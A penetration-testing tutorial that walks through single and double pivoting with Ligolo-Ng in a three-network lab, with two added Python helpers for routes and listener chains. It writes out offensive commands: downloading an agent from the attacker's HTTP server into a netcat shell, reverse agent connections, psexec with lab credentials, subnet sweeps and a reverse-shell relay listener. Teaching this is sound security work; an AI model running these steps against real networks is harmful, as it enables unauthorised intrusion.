This guide walks through lateral movement with Ligolo-Ng, a pivoting tool written by Nicolas Chatelain. Ligolo-Ng builds tunnels over reverse TCP/TLS connections and exposes the remote network through a local tun interface, so no SOCKS proxy or proxychains is needed. The guide first covers what sets the tool apart and then its practical use: single and double pivoting inside a lab network.
Download Ligolo-Ng:
Ligolo-Ng can be downloaded from the Releases page of the official repository: https://github.com/nicocha30/ligolo-ng/releases
Table of Contents:
1. Introduction to Ligolo-Ng
2. Ligolo V/S Chisel
3. Lab Setup
4. Prerequisites
5. Setting up Ligolo-Ng
6. Single Pivoting
7. Double Pivoting
Ligolo-Ng Overview:
Ligolo-Ng is a lightweight tool that lets penetration testers establish tunnels over reverse TCP/TLS connections and use them through a tun interface. Both components, the proxy (run on the attacking machine) and the agents (run on pivot hosts), are written in Go, and the tool behaves like a VPN: packets sent to the local tun interface are carried to the agent and emitted on the remote network. Because the tunnel works at the IP level rather than as a SOCKS proxy, ICMP (ping), UDP, nmap SYN scans, OS detection and DNS resolution all work through it, and the project reports throughput of up to 100 Mbit/s. Nothing but the agent binary has to be placed on the pivot host; scanning and exploitation tools stay on the attacking machine, which keeps the footprint on the target small.
Ligolo V/S Chisel:
- Ligolo-Ng is faster than Chisel and offers more customisation.
- Chisel exposes a SOCKS proxy over a single client-server tunnel, whereas Ligolo-Ng opens a separate session for each agent and attaches the chosen session to the local tun interface.
- Ligolo-Ng needs only the agent binary on the pivot host; the tools used through the tunnel remain on the attacking machine.
- Because it tunnels at the IP level, Ligolo-Ng carries ICMP, UDP and raw TCP (including SYN scans); Chisel transports traffic over HTTP/WebSocket and its SOCKS proxy is effectively limited to TCP connections.
Lab Setup
The walkthrough below uses three networks. Network A (192.168.1.0/24) holds the attacking machine, Kali, at 192.168.1.5. Network B (192.168.148.0/24) contains the first pivot, DC1 (192.168.148.130), and a Windows 10 host (192.168.148.132). Network C (192.168.159.0/24) is reached through the Windows 10 host (192.168.159.130) and contains a Metasploitable2 machine. Follow the step-by-step guide for lateral movement within this network, covering both single and double pivoting techniques.
Prerequisites
Obtain the Ligolo-Ng 'agent' archive for Windows 64-bit and the 'proxy' archive for Linux 64-bit from the Releases page.
The 'agent' binary runs on the target (pivot) machine and the 'proxy' binary on the attacking machine (Kali Linux).
Setting up Ligolo-Ng
Step 1: With both the agent and proxy archives downloaded, create the tun interface that Ligolo-Ng will attach its tunnels to. Check the current interfaces with 'ifconfig' first, then create the interface and bring it up (as root, or with sudo):
ip tuntap add user root mode tun ligolo
ip link set ligolo up
If the proxy will be run as an unprivileged user, put that username in place of root so the proxy is allowed to open the interface. Verify that the interface now exists with the 'ifconfig' command (or 'ip link show ligolo').
Step 2: Extract the Ligolo proxy archive:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
The proxy is the server side: agents connect back to it, and all subsequent pivoting actions are driven from its console. List its options with the help flag:
./proxy -h
Step 3: The options shown concern the TLS certificate the proxy presents to agents (Let's Encrypt automation, a user-supplied certificate and key, or a self-signed one). This walkthrough uses the '-selfcert' option, which generates a self-signed certificate; the proxy listens on port 11601 by default (changeable with -laddr). Because the certificate is self-signed, the agent will later be started with '-ignore-cert'. Start the proxy:
./proxy -selfcert
Step 4: The proxy is now running on the attacking machine. Next, extract the Windows agent archive:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
To transfer agent.exe to the target, serve the directory over HTTP with updog (port 80, so the download URL needs no port suffix):
updog -p 80
Step 5: In this scenario a shell on the first target (DC1) has already been obtained through netcat. Over that netcat connection, download the Ligolo agent onto the target:
cd Desktop
powershell wget http://192.168.1.5/agent.exe -OutFile agent.exe
dir
In PowerShell, wget is an alias for Invoke-WebRequest; -OutFile writes the response body to disk (the abbreviated -o works in Windows PowerShell 5.1 but is ambiguous in PowerShell 7).
Step 6: The agent file is now on the target. With the proxy already listening on Kali, start the agent and point it at the proxy; -ignore-cert accepts the self-signed certificate from Step 3:
.\agent.exe -connect 192.168.1.5:11601 -ignore-cert
The proxy console reports a new agent connection. Enter the 'session' command and select session 1, then run 'ifconfig' inside the session to list the agent's interfaces.
This reveals a second interface on the server with the address 192.168.148.130/24: an internal network (network B) that Kali cannot reach directly. The following steps build a tunnel into it.
Single Pivoting
In the single pivoting scenario, the aim is to reach network B from the attacking machine in network A, through the one compromised host that sits on both.
A direct ping of a network B address from Kali fails, because Kali has no route to that subnet.
Open a new terminal and add a route for the internal subnet via the ligolo interface, then confirm it:
ip route add 192.168.148.0/24 dev ligolo
ip route list
Return to the Ligolo proxy console and, inside session 1, enter the 'start' command to attach the tunnel to the interface. From this point, any packet Kali sends to 192.168.148.0/24 is delivered through the agent.
With the tunnel up, a netexec SMB sweep of the network B subnet found a second host, a Windows 10 machine, in addition to DC1.
Pinging that host now succeeds, where it previously did not, and a full nmap scan (SYN scan included, since the tunnel carries raw IP rather than SOCKS) can be run against it.
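The route added above (192.168.148.0/24 from a host address of 192.168.148.130/24) is derived by hand in the walkthrough. The helper below, an added example that is not part of Ligolo-Ng or of this guide, does that derivation for every IPv4 address in an agent's 'ifconfig' listing and emits the matching 'ip route add' commands. The sample listing is constructed to resemble the proxy's table output; the parser relies only on the 'IPv4 Address' rows. It skips loopback and link-local networks, the subnet the attacker already sits on (routing that through the tun interface would cut the agent's own reverse connection), and anything already covered by an existing route.

```python
"""Derive `ip route add` commands from a Ligolo-Ng agent's `ifconfig` output.

Added example, not part of the Ligolo-Ng project. The sample output below is
constructed to mirror the layout of the proxy's `ifconfig` command; the parser
only relies on the 'IPv4 Address' rows, so exact table borders do not matter.
"""
import ipaddress
import re

# Constructed sample: what `ifconfig` might print inside a session for an
# agent that is dual-homed between network A and network B.
SAMPLE_IFCONFIG = """
│ Name         │ Ethernet0                      │
│ IPv4 Address │ 192.168.1.100/24               │
│ Name         │ Ethernet1                      │
│ IPv4 Address │ 192.168.148.130/24             │
│ Name         │ Loopback Pseudo-Interface 1    │
│ IPv4 Address │ 127.0.0.1/8                    │
"""

# Matches the CIDR that follows an 'IPv4 Address' label, with or without a
# table border character between them.
CIDR_RE = re.compile(r"IPv4 Address\s*│?\s*(\d{1,3}(?:\.\d{1,3}){3}/\d{1,2})")


def agent_networks(ifconfig_text):
    """Return the IPv4 networks the agent sits on, in order of appearance."""
    nets = []
    for match in CIDR_RE.finditer(ifconfig_text):
        # ip_interface keeps host + prefix; .network gives the subnet itself.
        network = ipaddress.ip_interface(match.group(1)).network
        if network not in nets:
            nets.append(network)
    return nets


def routes_to_add(ifconfig_text, attacker_ip, tun="ligolo", existing=()):
    """Produce `ip route add` commands for subnets only reachable via the agent.

    attacker_ip: the proxy host's address (its own subnet must not be routed
                 through the tunnel, or the agent's connection is lost).
    existing:    CIDRs already routed via the tun interface, to avoid duplicates.
    """
    attacker = ipaddress.ip_address(attacker_ip)
    covered = [ipaddress.ip_network(cidr) for cidr in existing]
    commands = []
    for net in agent_networks(ifconfig_text):
        if net.is_loopback or net.is_link_local:
            continue
        if attacker in net:
            continue
        if any(net.subnet_of(c) for c in covered):
            continue
        commands.append(f"ip route add {net} dev {tun}")
    return commands


if __name__ == "__main__":
    for command in routes_to_add(SAMPLE_IFCONFIG, "192.168.1.5"):
        print(command)
```

Run it with the real listing pasted into SAMPLE_IFCONFIG (or fed to routes_to_add) and the proxy host's address; the output for the sample is a single command for 192.168.148.0/24, since 192.168.1.0/24 is the attacker's own network and 127.0.0.0/8 is loopback.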
Double Pivoting
In double pivoting the objective is to reach network C from network A, using a host in network B as the second pivot.
From the new terminal, use Impacket's psexec, through the tunnel already in place, to get a shell on the Windows 10 host found above (192.168.148.132), then download the Ligolo agent onto it (the credentials are the lab's):
impacket-psexec administrator:123@192.168.148.132
cd c:\users\public
powershell wget http://192.168.1.5/agent.exe -OutFile agent.exe
dir
Now run the agent. In this lab the Windows 10 host can reach the attacking machine directly, so it connects to the proxy on Kali exactly as the first agent did:
agent.exe -connect 192.168.1.5:11601 -ignore-cert
If the second pivot could not reach Kali, the first pivot would have to relay the connection: in session 1 add a listener with 'listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601', then start the second agent with '-connect 192.168.148.130:11601' so that it talks to DC1, whose agent forwards the connection to the proxy.
In the Ligolo-Ng proxy console a second session, corresponding to the Windows 10 host, now appears.
Run the 'session' command to list the sessions, move through them with the arrow keys and select the newest one, session 2. Inside it, run 'ifconfig' to inspect the interfaces: alongside the network B address there is a further interface, 192.168.159.130/24, belonging to network C.
A ping of that network from Kali fails: there is as yet no route from Kali to network C.
Add the network C subnet to the routing table, again via the ligolo interface, and confirm it:
ip route add 192.168.159.0/24 dev ligolo
ip route list
Next, add a listener on the Windows 10 agent (still in session 2). A listener binds a port on the pivot and relays whatever connects to it to an address on the attacking machine, so hosts in network C, which cannot reach Kali, can still deliver a callback (a reverse shell, for instance) to a handler on Kali's port 4444:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The proxy confirms that the listener is active. One more step is needed before tunnelling: with a single tun interface, only one session's tunnel can be attached to it at a time, and the 'help' output makes clear that session 1's tunnel is still running. Stop it in session 1 with the 'stop' command, then switch to session 2 and enter 'start'. Because the Windows 10 host sits on both network B and network C, both routes added so far (192.168.148.0/24 and 192.168.159.0/24) are now served through this second tunnel. This is the double pivot: traffic from Kali enters the ligolo interface, reaches the second agent and is emitted on network C. (Releases that support it also allow a second tun interface, created with ip tuntap and selected with 'start --tun <name>', so that both tunnels can stay up.)
Double pivoting is now in place. It was verified with crackmapexec:
crackmapexec smb 192.168.159.0/24
This found Metasploitable2 in network C, which could then be pinged and scanned with nmap through the tunnel, as the acquired network access allows.
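The double pivot above relies on the second host being able to reach Kali, and the listener shown is a callback relay. The planner below, an added example that is not part of Ligolo-Ng or of this guide, writes out the general multi-hop recipe for the case where only the first pivot can reach the attacker: each intermediate agent binds the proxy port and relays it to the proxy, and the next agent connects to that relay instead of to Kali. The chain in LAB_HOPS uses the hosts and addresses of this lab; the 'listener_add' and 'agent.exe -connect' syntax is Ligolo-Ng's, everything else (the dictionary keys, the function names) is this example's own.

```python
"""Plan the listener chain for a multi-hop Ligolo-Ng pivot.

Added example, not part of the Ligolo-Ng project. It encodes the relay rule
used when only the first pivot can reach the attacker: each intermediate agent
binds the proxy port and relays it to the proxy, and the next agent connects
to that relay rather than to the attacker. The host names and addresses in
LAB_HOPS are those of the lab described in this guide.
"""

PROXY_PORT = 11601  # the proxy's default listening port


def plan_pivot_chain(attacker_ip, hops, proxy_port=PROXY_PORT, tun="ligolo"):
    """Return, per hop, the agent command to run on it, the routes to add on
    the attacker, and (for intermediate hops) the listener to add in that
    hop's session before the next agent is started.

    hops: ordered list of dicts with keys
      name      - label for the pivot host
      reach     - address the *next* hop uses to reach this one (None for last)
      networks  - subnets this hop exposes that the attacker cannot reach
    """
    plan = []
    # The first agent talks to the proxy on the attacker directly.
    target = f"{attacker_ip}:{proxy_port}"
    for index, hop in enumerate(hops, start=1):
        step = {
            "session": index,
            "name": hop["name"],
            "agent_cmd": f"agent.exe -connect {target} -ignore-cert",
            "routes": [f"ip route add {net} dev {tun}" for net in hop["networks"]],
            "listener": None,
        }
        if index < len(hops):
            # Bind the proxy port on this pivot and relay it to the proxy;
            # the --to address is resolved on the proxy side of the session,
            # so 127.0.0.1 here is the attacking machine itself.
            step["listener"] = (f"listener_add --addr 0.0.0.0:{proxy_port} "
                                f"--to 127.0.0.1:{proxy_port}")
            target = f"{hop['reach']}:{proxy_port}"
        plan.append(step)
    return plan


def callback_listener(bind_port, handler_port):
    """Listener that lets hosts behind the pivot call back to a handler on the
    attacker: a reverse shell arriving on the pivot's bind_port is relayed to
    handler_port on the attacking machine."""
    return f"listener_add --addr 0.0.0.0:{bind_port} --to 127.0.0.1:{handler_port}"


# Lab chain from this guide: DC1 bridges networks A and B, the Windows 10
# host bridges networks B and C.
LAB_HOPS = [
    {"name": "DC1", "reach": "192.168.148.130", "networks": ["192.168.148.0/24"]},
    {"name": "Windows 10", "reach": None, "networks": ["192.168.159.0/24"]},
]

if __name__ == "__main__":
    for step in plan_pivot_chain("192.168.1.5", LAB_HOPS):
        print(f"[session {step['session']}: {step['name']}]")
        print("  on pivot :", step["agent_cmd"])
        for route in step["routes"]:
            print("  on kali  :", route)
        if step["listener"]:
            print("  in proxy :", step["listener"])
    print("  in proxy :", callback_listener(1234, 4444))
```

The order matters in practice: the listener for hop N must be added in session N (and that session's tunnel started, or the routes will not resolve) before the agent on hop N+1 is launched, and the routes for a hop's networks are only useful once a tunnel that can reach them is the one attached to the tun interface.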